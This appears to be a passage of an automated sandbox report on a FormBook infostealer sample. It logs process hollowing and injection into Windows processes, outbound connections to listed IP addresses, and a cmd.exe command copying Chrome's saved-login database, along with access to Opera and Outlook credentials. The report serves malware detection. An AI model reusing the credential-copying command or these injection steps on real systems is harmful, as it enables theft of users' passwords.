Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A2AE4 mov eax, dword ptr fs:[00000030h]	6_2_030A2AE4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h]	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03079100 mov eax, dword ptr fs:[00000030h]	6_2_03079100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03079100 mov eax, dword ptr fs:[00000030h]	6_2_03079100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03079100 mov eax, dword ptr fs:[00000030h]	6_2_03079100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov eax, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov eax, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov eax, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov eax, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120 mov ecx, dword ptr fs:[00000030h]	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A513A mov eax, dword ptr fs:[00000030h]	6_2_030A513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A513A mov eax, dword ptr fs:[00000030h]	6_2_030A513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309B944 mov eax, dword ptr fs:[00000030h]	6_2_0309B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309B944 mov eax, dword ptr fs:[00000030h]	6_2_0309B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307C962 mov eax, dword ptr fs:[00000030h]	6_2_0307C962
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B171 mov eax, dword ptr fs:[00000030h]	6_2_0307B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B171 mov eax, dword ptr fs:[00000030h]	6_2_0307B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309C182 mov eax, dword ptr fs:[00000030h]	6_2_0309C182
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AA185 mov eax, dword ptr fs:[00000030h]	6_2_030AA185
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A2990 mov eax, dword ptr fs:[00000030h]	6_2_030A2990
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F69A6 mov eax, dword ptr fs:[00000030h]	6_2_030F69A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A61A0 mov eax, dword ptr fs:[00000030h]	6_2_030A61A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A61A0 mov eax, dword ptr fs:[00000030h]	6_2_030A61A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F51BE mov eax, dword ptr fs:[00000030h]	6_2_030F51BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F51BE mov eax, dword ptr fs:[00000030h]	6_2_030F51BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F51BE mov eax, dword ptr fs:[00000030h]	6_2_030F51BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F51BE mov eax, dword ptr fs:[00000030h]	6_2_030F51BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h]	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031349A4 mov eax, dword ptr fs:[00000030h]	6_2_031349A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031349A4 mov eax, dword ptr fs:[00000030h]	6_2_031349A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031349A4 mov eax, dword ptr fs:[00000030h]	6_2_031349A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031349A4 mov eax, dword ptr fs:[00000030h]	6_2_031349A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B1E1 mov eax, dword ptr fs:[00000030h]	6_2_0307B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B1E1 mov eax, dword ptr fs:[00000030h]	6_2_0307B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307B1E1 mov eax, dword ptr fs:[00000030h]	6_2_0307B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031041E8 mov eax, dword ptr fs:[00000030h]	6_2_031041E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03144015 mov eax, dword ptr fs:[00000030h]	6_2_03144015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03144015 mov eax, dword ptr fs:[00000030h]	6_2_03144015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F7016 mov eax, dword ptr fs:[00000030h]	6_2_030F7016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F7016 mov eax, dword ptr fs:[00000030h]	6_2_030F7016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F7016 mov eax, dword ptr fs:[00000030h]	6_2_030F7016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B02A mov eax, dword ptr fs:[00000030h]	6_2_0308B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B02A mov eax, dword ptr fs:[00000030h]	6_2_0308B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B02A mov eax, dword ptr fs:[00000030h]	6_2_0308B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B02A mov eax, dword ptr fs:[00000030h]	6_2_0308B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h]	6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830 mov eax, dword ptr fs:[00000030h]	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830 mov eax, dword ptr fs:[00000030h]	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830 mov eax, dword ptr fs:[00000030h]	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830 mov eax, dword ptr fs:[00000030h]	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03090050 mov eax, dword ptr fs:[00000030h]	6_2_03090050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03090050 mov eax, dword ptr fs:[00000030h]	6_2_03090050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03132073 mov eax, dword ptr fs:[00000030h]	6_2_03132073
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03141074 mov eax, dword ptr fs:[00000030h]	6_2_03141074
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03079080 mov eax, dword ptr fs:[00000030h]	6_2_03079080
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F3884 mov eax, dword ptr fs:[00000030h]	6_2_030F3884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030F3884 mov eax, dword ptr fs:[00000030h]	6_2_030F3884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B90AF mov eax, dword ptr fs:[00000030h]	6_2_030B90AF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h]	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AF0BF mov ecx, dword ptr fs:[00000030h]	6_2_030AF0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AF0BF mov eax, dword ptr fs:[00000030h]	6_2_030AF0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AF0BF mov eax, dword ptr fs:[00000030h]	6_2_030AF0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov ecx, dword ptr fs:[00000030h]	6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h]	6_2_0310B8D0

Enables debug privileges

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 162.0.238.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 157.245.239.6 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.27 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.235.200.146 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.24.104.178 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 52.60.87.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.31.71.137 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\AT113020.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\AT113020.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Thread register set: target process: 3472	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 180000			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 9C0000			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\AT113020.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\AT113020.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2CC2008	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 6A4008	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2A01008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\AT113020.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior

Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000002.1016058264.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\AT113020.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	1_2_00405F80
Source: C:\Users\user\Desktop\AT113020.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	1_2_0040608C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	5_2_00405F80
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	5_2_0040608C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetLocaleInfoA,	5_2_0040BEEC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetLocaleInfoA,	5_2_0040BEA0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	5_2_040E5BA4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetLocaleInfoA,	5_2_040EA4A0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: GetLocaleInfoA,	5_2_040EA4EC

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0040A8E8 GetLocalTime,

1_2_0040A8E8

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_0048D5D0 GetVersion,

1_2_0048D5D0

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
